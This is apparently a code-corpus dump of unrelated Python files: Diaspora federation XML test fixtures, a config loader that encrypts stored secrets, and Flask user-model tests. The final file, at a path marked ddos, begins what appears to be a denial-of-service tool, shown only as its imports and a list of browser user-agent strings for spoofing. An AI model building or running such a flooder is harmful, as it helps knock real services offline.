<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<provider_display_name>Socialhome</provider_display_name>
</status_message>
"""
DIASPORA_POST_SIMPLE_WITH_MENTION = """
<status_message>
<text>((status message)) @{Jason Robinson 🐍🍻; jaywink@jasonrobinson.me}</text>
<guid>((guidguidguidguidguidguidguid))</guid>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<provider_display_name>Socialhome</provider_display_name>
</status_message>
"""
DIASPORA_POST_WITH_PHOTOS = """
<status_message>
<text>((status message))</text>
<guid>((guidguidguidguidguidguidguid))</guid>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<provider_display_name>Socialhome</provider_display_name>
<photo>
<guid>((guidguidguidguidguidguidguif))</guid>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<remote_photo_path>https://alice.diaspora.example.org/uploads/images/</remote_photo_path>
<remote_photo_name>1234.jpg</remote_photo_name>
<text/>
<status_message_guid>((guidguidguidguidguidguidguid))</status_message_guid>
<height>120</height>
<width>120</width>
</photo>
</status_message>
"""
DIASPORA_POST_INVALID = """
<status_message>
<text>((status message))</text>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<provider_display_name>Socialhome</provider_display_name>
</status_message>
"""
DIASPORA_POST_COMMENT = """
<comment>
<guid>((guidguidguidguidguidguid))</guid>
<parent_guid>((parent_guidparent_guidparent_guidparent_guid))</parent_guid>
<author_signature>((base64-encoded data))</author_signature>
<text>((text))</text>
<author>alice@alice.diaspora.example.org</author>
<author_signature>((signature))</author_signature>
</comment>
"""
DIASPORA_POST_COMMENT_NESTED = """
<comment>
<guid>((guidguidguidguidguidguid))</guid>
<parent_guid>((parent_guidparent_guidparent_guidparent_guid))</parent_guid>
<thread_parent_guid>((threadparentguid))</thread_parent_guid>
<author_signature>((base64-encoded data))</author_signature>
<text>((text))</text>
<author>alice@alice.diaspora.example.org</author>
<author_signature>((signature))</author_signature>
</comment>
"""
DIASPORA_POST_LIKE = """
<like>
<parent_type>Post</parent_type>
<guid>((guidguidguidguidguidguid))</guid>
<parent_guid>((parent_guidparent_guidparent_guidparent_guid))</parent_guid>
<author_signature>((base64-encoded data))</author_signature>
<positive>true</positive>
<author>alice@alice.diaspora.example.org</author>
<author_signature>((signature))</author_signature>
</like>
"""
DIASPORA_PROFILE = """
<profile>
<author>bob@example.com</author>
<first_name>Bob</first_name>
<last_name>Bobertson</last_name>
<image_url>https://example.com/uploads/images/thumb_large_c833747578b5.jpg</image_url>
<image_url_small>https://example.com/uploads/images/thumb_small_c8b147578b5.jpg</image_url_small>
<image_url_medium>https://example.com/uploads/images/thumb_medium_c8b1aab04f3.jpg</image_url_medium>
<gender></gender>
<bio>A cool bio</bio>
<location>Helsinki</location>
<searchable>true</searchable>
<nsfw>false</nsfw>
<tag_string>#socialfederation #federation</tag_string>
</profile>
"""
DIASPORA_PROFILE_FIRST_NAME_ONLY = """
<profile>
<author>bob@example.com</author>
<first_name>Bob</first_name>
<last_name></last_name>
<image_url>https://example.com/uploads/images/thumb_large_c833747578b5.jpg</image_url>
<image_url_small>https://example.com/uploads/images/thumb_small_c8b147578b5.jpg</image_url_small>
<image_url_medium>https://example.com/uploads/images/thumb_medium_c8b1aab04f3.jpg</image_url_medium>
<gender></gender>
<bio>A cool bio</bio>
<location>Helsinki</location>
<searchable>true</searchable>
<nsfw>false</nsfw>
<tag_string>#socialfederation #federation</tag_string>
</profile>
"""
DIASPORA_PROFILE_EMPTY_TAGS = """
<profile>
<author>bob@example.com</author>
<first_name>Bob</first_name>
<last_name>Bobertson</last_name>
<image_url>https://example.com/uploads/images/thumb_large_c833747578b5.jpg</image_url>
<image_url_small>https://example.com/uploads/images/thumb_small_c8b147578b5.jpg</image_url_small>
<image_url_medium>https://example.com/uploads/images/thumb_medium_c8b1aab04f3.jpg</image_url_medium>
<gender></gender>
<bio>A cool bio</bio>
<location>Helsinki</location>
<searchable>true</searchable>
<nsfw>false</nsfw>
<tag_string/>
</profile>
"""
DIASPORA_RETRACTION = """
<retraction>
<author>bob@example.com</author>
<target_guid>xxxxxxxxxxxxxxxx</target_guid>
<target_type>Post</target_type>
</retraction>
"""
DIASPORA_CONTACT = """
<contact>
<author>alice@example.com</author>
<recipient>bob@example.org</recipient>
<following>true</following>
<sharing>true</sharing>
</contact>
"""
DIASPORA_RESHARE = """
<reshare>
<author>alice@example.org</author>
<guid>a0b53e5029f6013487753131731751e9</guid>
<created_at>2016-07-12T00:36:42Z</created_at>
<root_author>bob@example.com</root_author>
<root_guid>a0b53bc029f6013487753131731751e9</root_guid>
<text></text>
</reshare>
"""
DIASPORA_RESHARE_WITH_EXTRA_PROPERTIES = """
<reshare>
<author>alice@example.org</author>
<guid>a0b53e5029f6013487753131731751e9</guid>
<created_at>2016-07-12T00:36:42Z</created_at>
<provider_display_name/>
<root_author>bob@example.com</root_author>
<root_guid>a0b53bc029f6013487753131731751e9</root_guid>
<public>true</public>
<raw_content>Important note here</raw_content>
<entity_type>Comment</entity_type>
</reshare>
"""
DIASPORA_WEBFINGER_JSON = """{
"subject": "acct:alice@example.org",
"links": [
{
"rel": "http://microformats.org/profile/hcard",
"type": "text/html",
"href": "https://example.org/hcard/users/7dba7ca01d64013485eb3131731751e9"
},
{
"rel": "http://joindiaspora.com/seed_location",
"type": "text/html",
"href": "https://example.org/"
}
]
}
"""
DIASPORA_HOSTMETA = """<?xml version="1.0" encoding="UTF-8"?>
<XRD xmlns="http://docs.oasis-open.org/ns/xri/xrd-1.0">
<Link rel="lrdd" template="https://example.com/webfinger?q={uri}" type="application/xrd+xml"/>
</XRD>
"""
DIASPORA_WEBFINGER = """<?xml version="1.0" encoding="UTF-8"?>
<XRD xmlns="http://docs.oasis-open.org/ns/xri/xrd-1.0">
<Subject>acct:user@server.example</Subject>
<Alias>https://server.example/people/0123456789abcdef</Alias>
<Link href="https://server.example/hcard/users/0123456789abcdef" rel="http://microformats.org/profile/hcard" type="text/html"/>
<Link href="https://server.example" rel="http://joindiaspora.com/seed_location" type="text/html"/>
<Link href="0123456789abcdef" rel="http://joindiaspora.com/guid" type="text/html"/>
<Link href="https://server.example/u/user" rel="http://webfinger.net/rel/profile-page" type="text/html"/>
<Link href="https://server.example/public/user.atom" rel="http://schemas.google.com/g/2010#updates-from" type="application/atom+xml"/>
<Link href="QUJDREVGPT0=" rel="diaspora-public-key" type="RSA"/>
</XRD>
"""
| 42.804878 | 737 | 0.718803 |
7d95f74f5697483bec6bdddee19240a1191f8a4d | 4,961 | py | Python | lib/config.py | qvant/idle_rpg_bot | a9090568383de8250d9a84a0b459fb764ee87892 | [
"MIT"
] | null | null | null | lib/config.py | qvant/idle_rpg_bot | a9090568383de8250d9a84a0b459fb764ee87892 | [
"MIT"
] | null | null | null | lib/config.py | qvant/idle_rpg_bot | a9090568383de8250d9a84a0b459fb764ee87892 | [
"MIT"
] | null | null | null | import codecs
import datetime
import json
from .consts import LOG_CONFIG
from .security import is_password_encrypted, encrypt_password, decrypt_password
from .utility import get_logger
# JSON keys recognized in the bot configuration file.
CONFIG_PARAM_LOG_LEVEL = "LOG_LEVEL"
CONFIG_PARAM_QUEUE_PASSWORD = "QUEUE_PASSWORD"
CONFIG_PARAM_QUEUE_USER = "QUEUE_USER"
CONFIG_PARAM_QUEUE_HOST = "QUEUE_HOST"
CONFIG_PARAM_QUEUE_PORT = "QUEUE_PORT"
CONFIG_PARAM_NEW_PATH = "CONFIG_PATH"
CONFIG_PARAM_CONFIG_RELOAD_TIME = "CONFIG_RELOAD_TIME"
CONFIG_PARAM_BOT_SECRET = "BOT_SECRET"
CONFIG_PARAM_BOT_SERVER_NAME = "BOT_SERVER_NAME"
CONFIG_PARAM_ADMIN_LIST = "ADMIN_ACCOUNTS"
CONFIG_PARAM_DB_PORT = "DB_PORT"
CONFIG_PARAM_DB_NAME = "DB_NAME"
CONFIG_PARAM_DB_HOST = "DB_HOST"
CONFIG_PARAM_DB_USER = "DB_USER"
CONFIG_PARAM_DB_PASSWORD = "DB_PASSWORD"


class Config:
    """Bot configuration loaded from a JSON file.

    On first load, any plain-text secrets found in the file are encrypted
    and written back; encrypted secrets are decrypted into memory for use.

    :param file: path to the JSON configuration file.
    :param reload: True when re-reading configuration on an existing
        instance; skips logger creation.
    """

    def __init__(self, file: str, reload: bool = False):
        # Use a context manager so the handle is closed even if the JSON
        # is malformed (the original leaked this file handle).
        with codecs.open(file, 'r', "utf-8") as fp:
            config = json.load(fp)
        if not reload:
            self.logger = get_logger(LOG_CONFIG, is_system=True)
        # NOTE(review): with reload=True this relies on self.logger having
        # been set by a previous non-reload __init__ on the same instance —
        # confirm callers never construct a fresh Config with reload=True.
        self.logger.info("Read settings from {0}".format(file))
        self.file_path = file
        self.old_file_path = file
        self.server_name = config.get(CONFIG_PARAM_BOT_SERVER_NAME)
        self.queue_port = config.get(CONFIG_PARAM_QUEUE_PORT)
        self.queue_host = config.get(CONFIG_PARAM_QUEUE_HOST)
        self.queue_user = config.get(CONFIG_PARAM_QUEUE_USER)
        self.queue_password = config.get(CONFIG_PARAM_QUEUE_PASSWORD)
        self.secret = config.get(CONFIG_PARAM_BOT_SECRET)
        # First run: the bot secret is stored in plain text — encrypt it and
        # persist the cipher text; afterwards, decrypt for in-memory use.
        if not is_password_encrypted(self.secret):
            self.logger.info("Secret in plain text, start encryption")
            new_password = encrypt_password(self.secret, self.server_name, self.queue_port)
            self._save_secret(new_password)
            self.logger.info("Secret was encrypted and saved")
        else:
            self.logger.info("Secret in cypher text, start decryption")
            self.secret = decrypt_password(self.secret, self.server_name, self.queue_port)
            self.logger.info("Secret was decrypted")
        # Same encrypt-on-first-run scheme for the queue password.
        if not is_password_encrypted(self.queue_password):
            self.logger.info("Password in plain text, start encryption")
            new_password = encrypt_password(self.queue_password, self.server_name, self.queue_port)
            self._save_password(new_password)
            self.logger.info("Password was encrypted and saved")
        else:
            self.logger.info("Password in cypher text, start decryption")
            self.queue_password = decrypt_password(self.queue_password, self.server_name, self.queue_port)
            self.logger.info("Password was decrypted")
        self.db_name = config.get(CONFIG_PARAM_DB_NAME)
        self.db_port = config.get(CONFIG_PARAM_DB_PORT)
        self.db_host = config.get(CONFIG_PARAM_DB_HOST)
        self.db_user = config.get(CONFIG_PARAM_DB_USER)
        self.db_password_read = config.get(CONFIG_PARAM_DB_PASSWORD)
        # DB password uses db_port (not queue_port) as part of the key material.
        if is_password_encrypted(self.db_password_read):
            self.logger.info("DB password encrypted, do nothing")
            self.db_password = decrypt_password(self.db_password_read, self.server_name, self.db_port)
        else:
            self.logger.info("DB password in plain text, start encrypt")
            password = encrypt_password(self.db_password_read, self.server_name, self.db_port)
            self._save_db_password(password)
            self.logger.info("DB password encrypted and save back in config")
            self.db_password = self.db_password_read
        self.log_level = config.get(CONFIG_PARAM_LOG_LEVEL)
        self.admin_list = config.get(CONFIG_PARAM_ADMIN_LIST)
        self.logger.setLevel(self.log_level)
        # The config may redirect subsequent reloads to a different file.
        if config.get(CONFIG_PARAM_NEW_PATH) is not None:
            self.file_path = config.get(CONFIG_PARAM_NEW_PATH)
        self.reload_time = config.get(CONFIG_PARAM_CONFIG_RELOAD_TIME)
        self.next_reload = datetime.datetime.now()
        self.reloaded = False

    def _save_config_value(self, key: str, value: str):
        """Rewrite the config file with ``key`` set to ``value``.

        All other entries are preserved; file handles are closed via
        context managers even if reading or serialization fails.
        """
        with codecs.open(self.file_path, 'r', "utf-8") as fp:
            config = json.load(fp)
        config[key] = value
        with codecs.open(self.file_path, 'w', "utf-8") as fp:
            json.dump(config, fp, indent=2)

    def _save_secret(self, password: str):
        """Persist the (encrypted) bot secret back into the config file."""
        self._save_config_value(CONFIG_PARAM_BOT_SECRET, password)

    def _save_password(self, password: str):
        """Persist the (encrypted) queue password back into the config file."""
        self._save_config_value(CONFIG_PARAM_QUEUE_PASSWORD, password)

    def _save_db_password(self, password: str):
        """Persist the (encrypted) DB password back into the config file."""
        self._save_config_value(CONFIG_PARAM_DB_PASSWORD, password)
| 45.513761 | 106 | 0.689579 |
b0ba865f88c63ce8a7537fb97e810be5af74e908 | 7,292 | py | Python | tests/test_user_model.py | MK1230/blog_instance | 6bf50328909624fe58ccfe60971620ca4b142ecb | [
"MIT"
] | null | null | null | tests/test_user_model.py | MK1230/blog_instance | 6bf50328909624fe58ccfe60971620ca4b142ecb | [
"MIT"
] | 3 | 2020-03-24T15:28:48.000Z | 2021-02-02T21:41:35.000Z | tests/test_user_model.py | weqopy/blog_instance | 6bf50328909624fe58ccfe60971620ca4b142ecb | [
"MIT"
] | null | null | null | import unittest
import time
from datetime import datetime
from app import create_app, db
from app.models import User, Role, Permission, AnonymousUser, Follow
class UserModelTestCase(unittest.TestCase):
def setUp(self):
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
self.app_context.pop()
def test_password_setter(self):
u = User(password='cat')
self.assertTrue(u.password_hash is not None)
def test_no_password_getter(self):
u = User(password='cat')
with self.assertRaises(AttributeError):
u.password
def test_password_verification(self):
u = User(password='cat')
self.assertTrue(u.verify_password('cat'))
self.assertFalse(u.verify_password('dog'))
def test_password_salts_are_random(self):
u = User(password='cat')
u2 = User(password='cat')
self.assertFalse(u.password_hash == u2.password_hash)
def test_token_generate(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
token = u.generate_confirmation_token()
self.assertTrue(u.confirm(token))
def test_invalid_confirmation_token(self):
u1 = User(password='cat')
u2 = User(password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
token = u1.generate_confirmation_token()
self.assertFalse(u2.confirm(token))
def test_expired_confirmation_token(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
token = u.generate_confirmation_token(1)
time.sleep(3)
self.assertFalse(u.confirm(token))
def test_valid_reset_token(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
token = u.generate_reset_token()
self.assertTrue(u.reset_password(token, 'dog'))
self.assertTrue(u.verify_password('dog'))
def test_invalid_reset_token(self):
u1 = User(password='cat')
u2 = User(password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
token = u1.generate_reset_token()
self.assertFalse(u2.reset_password(token, 'horse'))
self.assertTrue(u2.verify_password('dog'))
def test_valid_email_change_token(self):
u = User(email='john@example.com', password='cat')
db.session.add(u)
db.session.commit()
token = u.generate_change_email_token('susan@example.org')
self.assertTrue(u.change_email(token))
self.assertTrue(u.email == 'susan@example.org')
def test_invalid_email_change_token(self):
u1 = User(email='john@example.com', password='cat')
u2 = User(email='susan@example.org', password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
token = u1.generate_change_email_token('david@example.net')
self.assertFalse(u2.change_email(token))
self.assertTrue(u2.email == 'susan@example.org')
def test_duplicate_email_change_token(self):
u1 = User(email='john@example.com', password='cat')
u2 = User(email='susan@example.org', password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
token = u2.generate_change_email_token('john@example.com')
self.assertFalse(u2.change_email(token))
self.assertTrue(u2.email == 'susan@example.org')
def test_roles_and_permissions(self):
Role.insert_roles()
u = User(email='john@example.com', password='cat')
self.assertTrue(u.can(Permission.WRITE_ARTICLES))
self.assertFalse(u.can(Permission.MODERATE_COMMENTS))
def test_anonymous_user(self):
u = AnonymousUser()
self.assertFalse(u.can(Permission.FOLLOW))
def test_timestamps(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
self.assertTrue(
(datetime.utcnow() - u.member_since).total_seconds() < 3)
self.assertTrue(
(datetime.utcnow() - u.last_seen).total_seconds() < 3)
def test_ping(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
time.sleep(2)
last_seen_before = u.last_seen
u.ping()
self.assertTrue(u.last_seen > last_seen_before)
def test_gravatar(self):
u = User(email='john@example.com', password='cat')
with self.app.test_request_context('/'):
gravatar = u.gravatar()
gravatar_256 = u.gravatar(size=256)
gravatar_pg = u.gravatar(rating='pg')
gravatar_retro = u.gravatar(default='retro')
with self.app.test_request_context('/', base_url='https://example.com'):
gravatar_ssl = u.gravatar()
self.assertTrue('http://www.gravatar.com/avatar/' +
'd4c74594d841139328695756648b6bd6'in gravatar)
self.assertTrue('s=256' in gravatar_256)
self.assertTrue('r=pg' in gravatar_pg)
self.assertTrue('d=retro' in gravatar_retro)
self.assertTrue('https://secure.gravatar.com/avatar/' +
'd4c74594d841139328695756648b6bd6' in gravatar_ssl)
def test_follows(self):
u1 = User(email='john@example.com', password='cat')
u2 = User(email='susan@example.org', password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
self.assertFalse(u1.is_following(u2))
self.assertFalse(u1.is_followed_by(u2))
timestamp_before = datetime.utcnow()
u1.follow(u2)
db.session.add(u1)
db.session.commit()
timestamp_after = datetime.utcnow()
self.assertTrue(u1.is_following(u2))
self.assertFalse(u1.is_followed_by(u2))
self.assertTrue(u2.is_followed_by(u1))
self.assertTrue(u1.followed.count() == 2)
self.assertTrue(u2.followers.count() == 2)
f = u1.followed.all()[-1]
self.assertTrue(f.followed == u2)
self.assertTrue(timestamp_before <= f.timestamp <= timestamp_after)
f = u2.followers.all()[-1]
self.assertTrue(f.follower == u1)
u1.unfollow(u2)
db.session.add(u1)
db.session.commit()
self.assertTrue(u1.followed.count() == 1)
self.assertTrue(u2.followers.count() == 1)
self.assertTrue(Follow.query.count() == 2)
u2.follow(u1)
db.session.add(u1)
db.session.add(u2)
db.session.commit()
db.session.delete(u2)
db.session.commit()
self.assertTrue(Follow.query.count() == 1)
def test_to_json(self):
u = User(email='john@example.com', password='cat')
db.session.add(u)
db.session.commit()
json_user = u.to_json()
expected_keys = ['url', 'username', 'member_since', 'last_seen',
'posts', 'followed_posts', 'post_count']
self.assertEqual(sorted(json_user.keys()), sorted(expected_keys))
self.assertTrue('api/v1.0/users/' in json_user['url'])
| 36.46 | 80 | 0.620817 |
b44747ffbd8ec85081e81b14bf8618f933aa7141 | 24,524 | py | Python | ddos/Zeus/ZeusCloryV2.py | mr-kritik/android_soft | f484895c72d140efcdab53e5777494de1515a4b1 | [
"Apache-2.0"
] | null | null | null | ddos/Zeus/ZeusCloryV2.py | mr-kritik/android_soft | f484895c72d140efcdab53e5777494de1515a4b1 | [
"Apache-2.0"
] | null | null | null | ddos/Zeus/ZeusCloryV2.py | mr-kritik/android_soft | f484895c72d140efcdab53e5777494de1515a4b1 | [
"Apache-2.0"
] | null | null | null | import random
import socket
import threading
import time
import os
useragents = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
